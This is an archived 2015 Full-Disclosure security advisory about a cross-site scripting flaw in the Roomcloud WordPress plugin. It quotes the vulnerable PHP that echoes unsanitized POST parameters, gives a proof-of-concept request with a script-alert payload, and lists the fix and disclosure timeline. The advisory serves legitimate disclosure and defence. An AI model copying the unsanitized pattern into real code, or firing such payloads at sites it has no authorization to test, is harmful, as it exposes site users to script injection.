lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 09 May 2015 05:45:40 +0000
From: Nitin Venkatesh <venkatesh.nitin@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Wordpress Roomcloud plugin v1.1(rev @1115307) XSS vulnerability

## Details

# Title: Unsanitized parameters in Wordpress Roomcloud plugin v1.1(rev
@1115307) allows Cross-site Scripting
# Submitter: Nitin Venkatesh <venkatesh [dot] nitin [at] gmail [dot] com>
# Product: Wordpress Roomcloud plugin
# Product URL: https://wordpress.org/plugins/roomcloud
# Vulnerability Type: Cross-site Scripting [CWE-79]
# Affected Versions: Tested on v1.1 (revision @1115307)
# Fixed Version: v1.1 (revision @1117499)
# Link to source code diff:
https://plugins.trac.wordpress.org/changeset/1117499
# CVE Status: None/Unassigned/Fresh

## Product Information

A Plugin to add roomcloud booking form to hotel website using [roomcloud]
shortcode

Use Roomcloud plugin to embed our Booking Engine form into your wordpress
site.
This allows your customers to make online reservations on the web site of
your hotel.
More info at http://www.roomcloud.net

## Vulnerability Description

Unsantized POST parameters are susceptible to XSS in the roomcloud.php file
viz., (1)pin, (2)start_day, (3)start_month, (4)start_year, (5)end_day,
(6)end_month, (7)end_year, (8)lang, (9)adults, (10)children

## Vulnerable Source Code

39 echo('<iframe width="800" height="600" src="');
40
41     echo('
http://www.roomcloud.net/be/se1/hotel.jsp?hotel='.$_POST['hotel'].'&pin='.$_POST['pin'].'&start_day='.$_POST['start_day'].'&start_month='.$_POST['start_month'].'&start_year='.$_POST['start_year'].'&end_day='.$_POST['end_day'].'&end_month='.$_POST['end_month'].'&end_year='.$_POST['end_year'].'&r=1&a=1&lang='.$_POST['lang'].'&t=0&n=0&adults='.$_POST['adults'].'&children='.$_POST['children'].$chlda
);
42
43     echo('"></iframe>');

## Proof of Concept

Sample exploit POST request body:

hotel=144&lang=en&start_day="><script>alert(1);</script>&start_month=03&start_year=2015&end_day=20&end_month=03&end_year=2015&adults=2&pin=&children=

## Solution:

Upgrade to latest version of the plugin.

## Disclosure Timeline:

2015-03-19 - Informed developer in support forums for the plugin & mailed
Wordpress plugins team
2015-03-21 - Plugin disabled for download by Wordpress team
2015-03-21 - Contacted developer via email
2015-03-21 - Vulnerability fixed by developer
2015-03-22 - Agreed to public disclosure on/after May 5, 2015
2015-03-23 - Wordpress Plugins team re-enables download page
2015-05-09 - Publishing disclosure on FD mailing list.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ